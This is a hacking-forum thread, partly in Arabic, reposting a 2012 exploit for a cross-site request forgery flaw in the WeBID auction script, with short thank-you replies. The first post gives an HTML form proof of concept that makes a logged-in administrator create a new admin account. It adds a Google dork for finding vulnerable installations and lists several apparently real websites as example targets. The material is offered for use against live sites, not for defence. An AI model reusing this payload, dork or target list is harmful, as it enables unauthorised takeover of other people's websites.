1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : n4ss1m | المشاهدات : 3,074 | الردود : 3
حالة الموضوع:
مغلق
  1. n4ss1m Developer

    الأنتساب:
    ‏2 مايو 2012
    المشاركات:
    6
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    الإقامة:
    SQL
    نظام التشغيل:
    Linux
    كود PHP:
    ##################################################
    # Title :WeBID CSRF Vulnerability (All Version)  #
    # Author :n4ss1m                                 #
    # Date :12.MAR.30                                #
    # Security :LOW                                  #
    # Google Dork : allintext: "powered by webid"    #
    ##################################################

    Note :

    Works IF magic_quotes_gpc off .

    P0C :
    <
    form name="conf" action="http://domain.tld/path/admin/newadminuser.php" method="post">
    <
    table>
    <
    input type="text" name="username" value="n4ss1m">
    <
    input type="password" name="password" value="">
    <
    input type="password" name="repeatpassword" value="">
    </
    table>
    <
    input type="hidden" name="status" value="1">
    <
    input type="hidden" name="csrftoken" value="2ba424e53306e55aafba5914a68f8a7d">
    <
    input type="hidden" name="action" value="update">
    <
    input type="submit" name="act" class="centre" value="Submit">
    </
    form>


    Example Site :

    http://mcs-1.com/
    http://usedwiiu.com/
    http://neobroker.com/webid/
    http://advantekkshocks.com/WeBid/
    ( And More In Google :)

    ################################################################################################################
    # Special Thx To : Lito , Mr.Ps , The Injector , B0x ;) , Ked-Ans , Hacker-1420 , Mad Hacker'z ,               #
    # Sec4ever , Sec4Leb.com , iq-t34m.host.org , V4-team.com , Mr.Hacker , Xref , Y3OULS , Mr.NORVI , Mr.XKILler  #
    # And InJ3cT0R T34M , 1337day.com                                                                              #
    ################################################################################################################


    # 1337day.com [2012-03-30]
     
  2. n4ss1m Developer

    الأنتساب:
    ‏2 مايو 2012
    المشاركات:
    6
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    الإقامة:
    SQL
    نظام التشغيل:
    Linux
    رد: WeBID CSRF Vulnerability All Version

    i:q3^:i:q3^:i:q3^:i:q3^:
     
  3. вαиɒєя DeveloPer Plus

    الأنتساب:
    ‏17 ديسمبر 2011
    المشاركات:
    142
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    50
    الوظيفة:
    طآلب
    الإقامة:
    k.s.a
    رد: WeBID CSRF Vulnerability All Version

    الله يعطيك الف عافية
    &:":
     
  4. Dr.reo Developer

    الأنتساب:
    ‏6 مايو 2012
    المشاركات:
    58
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    30
    الإقامة:
    الجزائر
    نظام التشغيل:
    Linux
    رد: WeBID CSRF Vulnerability All Version

    [font=ae_almothnna]بارك الله فيك
    واصل الى الأمام
    موفق
    &:":
    [/font]
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة